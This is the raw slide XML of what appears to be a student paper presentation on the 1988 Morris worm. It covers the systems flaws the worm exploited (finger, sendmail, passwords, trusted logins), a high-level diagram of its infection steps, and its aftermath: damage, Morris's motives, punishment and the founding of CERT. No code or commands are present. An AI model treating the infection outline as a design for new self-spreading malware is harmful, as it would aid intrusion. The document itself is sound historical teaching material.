              <p:nvGrpSpPr>
                <p:cNvPr id="46" name="Gruppieren 45"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="47" name="Pfeil: nach oben gekrümmt 46"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="48" name="Pfeil: nach oben gekrümmt 47"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Pfeil: nach rechts 41"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="277793"/>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3" name="Rechteck 42"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284258" y="4879932"/>
                <a:ext cx="1983673" cy="81197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 u="sng" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="44" name="Gerade Verbindung mit Pfeil 43"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="45" idx="3"/>
                <a:endCxn id="43" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790596" y="5230925"/>
                <a:ext cx="493663" cy="54993"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="3175">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:prstDash val="dash"/>
                <a:tailEnd type="triangle"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:schemeClr val="accent1"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:schemeClr val="accent1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="tx1"/>
              </a:fontRef>
            </p:style>
          </p:cxnSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Grafik 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7811868" y="2872265"/>
              <a:ext cx="1506716" cy="1968186"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Gruppieren 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4590550" y="3865454"/>
              <a:ext cx="6608453" cy="1766704"/>
              <a:chOff x="4476250" y="3460336"/>
              <a:chExt cx="6608453" cy="1766704"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Textfeld 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7697567" y="4403745"/>
                <a:ext cx="3387136" cy="823295"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>4. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Transfer and execute vector program, which re-connects to server and transfer the main-program</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Pfeil: nach rechts 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="4476250" y="3460336"/>
                <a:ext cx="3171463" cy="27779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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Textfeld 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9738655" y="3023379"/>
              <a:ext cx="1801024" cy="1076616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Main-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                <a:t>ProgramInstantiation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t> and </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>“hiding itself “</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Pfeil: gestreift nach rechts 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464272" y="2978444"/>
            <a:ext cx="642551" cy="521426"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42484"/>
              <a:gd name="adj2" fmla="val 50000"/>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921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Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Foliennummernplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Paper Presentation – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1350818"/>
            <a:ext cx="7920992" cy="736490"/>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521437">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History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2317984"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="2256875"/>
            <a:ext cx="7920992" cy="1322172"/>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521437">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Foundations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worm vs. Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws of the Systems: Finger(d), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Passwords, Trusted Logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3809723"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="3748614"/>
            <a:ext cx="7920992" cy="1321200"/>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521437">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Functionality of the Morris Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High-Level Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detailed Functionalities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5298878"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608042" y="5239381"/>
            <a:ext cx="7920992" cy="735006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00336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521437">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Aftermath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2426782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Aftermath – Damage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Morris worm was the first computer worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Around 6000 major UNIX machines were infected (10% of the network at that time)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important nation-wide gateways were shutdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No code present in the worm that would explicitly damage any system and no mechanism to stop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Offensive” Functionality: Send every 15 infections an uninitialized byte message to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ernie.berkely.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code was incorrect and never transferred any data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Speculations: monitoring process or he simply wanted to cast suspicion on Berkeley</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2129079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Aftermath – Who and Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Primary Questions: Who and Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Robert T. Morris (Graduate Student at Cornell Uni)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No statement form Morris, only speculations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Revenge against his father</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impress people</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Experiment gone awry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Not in the paper:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>to figure out how big the Internet was…” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>[2]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consequences:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Topic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>debated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Punishment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0"/>
              <a:t>Not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1"/>
              <a:t>paper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0"/>
              <a:t>: 400h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1"/>
              <a:t>community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0"/>
              <a:t> &amp; $10,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" i="1" dirty="0"/>
              <a:t>[2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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7320" y="1193506"/>
            <a:ext cx="2971038" cy="3008646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3958299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Aftermath - CERT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>NCSC post-mortem workshop:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommendations: Formal crisis center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>After another attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CERT (Computer Emergency Response Team) was established</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purpose: To act as a central switchboard and coordinator for computer security emergencies on Arpanet and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MILnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not the whole “internet” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CSnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Bitnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NSFnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and other internet communities)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1423959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Aftermath – Fix the Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both the Internet and UNIX helped to defeat the worm as well as spread it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication and ability to copy source and binary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Fixing the problem not only means fixing the flaws - it…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…should point out that we need a better mechanism in place to coordinate information about security flaws and attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…should prompt us to think about the ethics and laws concerning access to computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
